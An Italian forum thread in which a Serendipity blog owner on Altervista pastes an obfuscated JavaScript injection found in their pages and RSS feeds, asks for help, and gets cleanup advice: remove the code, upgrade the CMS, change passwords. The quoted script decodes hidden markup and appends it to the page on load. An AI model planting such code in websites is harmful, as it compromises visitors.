[Serendipity 1.4.1] strano script sito bloccato

[ellisse]

Ieri il mio sito è stato bloccato (non si apriva nemmeno l'index.php). Da una analisi ho trovato questo script, che il mio CMS (Serendipity 1.4.1) non riesce a capire e blocca tutto. Ho fatto una reinstallazione e una ripulitura e funziona quasi tutto ( non bene), tranne i feeds (tutti) che danno un errore come quello che trascrivo in fondo. Potete aiutarmi, credo che il problema sia lato server.
<script>
function TndCnxgIV(SUUc, uDZiL, MTOkPVep){var Xzg=MTOkPVep.split(uDZiL);var duXB='';for(GKg=0;GKg<(Xzg.length-1);GKg++){ xAEAp = Xzg[GKg]^SUUc;duXB += String.fromCharCode(xAEAp);}return duXB;}
function CiHX(){var BMJbOrAQvH=new Function("GUIgw", "return "+TndCnxgIV(-0x2c+0x11+0x12+0x340, 'q','851q856q852q834q858q850q857q835q')+"."+TndCnx gIV(-0xc-0x2c+0xf-0x19+0x359, 'S','885S888S883S878S')+"");var COsbeLlj=BMJbOrAQvH(0x2c+0x2c-0x2c-0xa-0x20-0x1);COsbeLlj.innerHTML += TndCnxgIV(0x1c-0x7+0x16-0x1f+0x2+0x16e, 't','320t277t282t270t285t273t281t348t267t277t280t2 64t276t321t333t348t276t281t277t283t276t264t321t333 t348t286t275t270t280t281t270t321t332t348t282t270t2 85t273t281t286t275t270t280t281t270t321t332t348t271 t270t287t321t347t276t264t264t268t326t339t339t285t2 81t270t275t271t264t285t264t271t338t265t271t339t264 t271t280t339t283t275t338t268t276t268t323t271t277t2 80t321t333t347t322t320t339t277t282t270t285t273t281 t322t');}
if(window.addEventListener){window.addEventListene r('load',CiHX,false);}else if(window.attachEvent){window.attachEvent('onload' , CiHX);}
</script>

errore:
Errore interpretazione XML: non well-formed
Indirizzo: http://nomesito.altervista.org/index...eds/index.rss2
Linea numero 2, colonna 99:function TndCnxgIV(SUUc, uDZiL, MTOkPVep){var Xzg=MTOkPVep.split(uDZiL);var duXB='';for(GKg=0;GKg<(Xzg.length-1);GKg++){ xAEAp = Xzg[GKg]^SUUc;duXB += String.fromCharCode(xAEAp);}return duXB;}
--------------------------------------------------------------------------------------------------
grazie

[andreafallico]

Quando accedo al tuo sito ecco la sorpresa...

Utilizzi servizi esterni? Se si, puoi guardare qui.
Oppure sarà qualche bug di Serendipity 1.4

Inoltre, ho notato che moltissimi siti presenti su altervista hanno lo stesso virus.

[ellisse]

Quando accedo al tuo sito ecco la sorpresa...

Utilizzi servizi esterni? Se si, puoi guardare qui.
Oppure sarà qualche bug di Serendipity 1.4

Inoltre, ho notato che moltissimi siti presenti su altervista hanno lo stesso virus.

grazie...hai qualche consiglio? ho visto il link che mi hai segnalato, ma non ho nessuno dei siti sospetti


EDIT:

grazie...hai qualche consiglio? ho visto il link che mi hai segnalato, ma non ho nessuno dei siti sospetti

inoltre succede anche con l'upgrade di Serendipity. Lo script sembra essere rimasto solo nei feeds, in altri moduli ero già riuscito a cancellarlo. Ci vorrebbe un antivirus,penso...

[andreafallico]

Infatti anche i Feed sono infetti

Intanto elimina quel codice da tutti i file, poi dei fare l'upgrade all'ultima versione e poi, per sicurezza, cambia le password del pannello.

[ellisse]

ci provo, grazie...l'upgrade l'ho già fatto, molti file li ho puliti, ma purtroppo ../feeds/index.rss2 (e anche gli altri feeds) non sono raggiungibili via ftp



ho ripulito tutto e ora sembra funzionare, compresi i feed. Spero che il Trojan non sia lato server, sennò è inutile...
grazie

[andreafallico]

L'antivirus non mi blocca più le pagine.
L'importante è tenere i CMS sempre aggiornati all'ultima versione.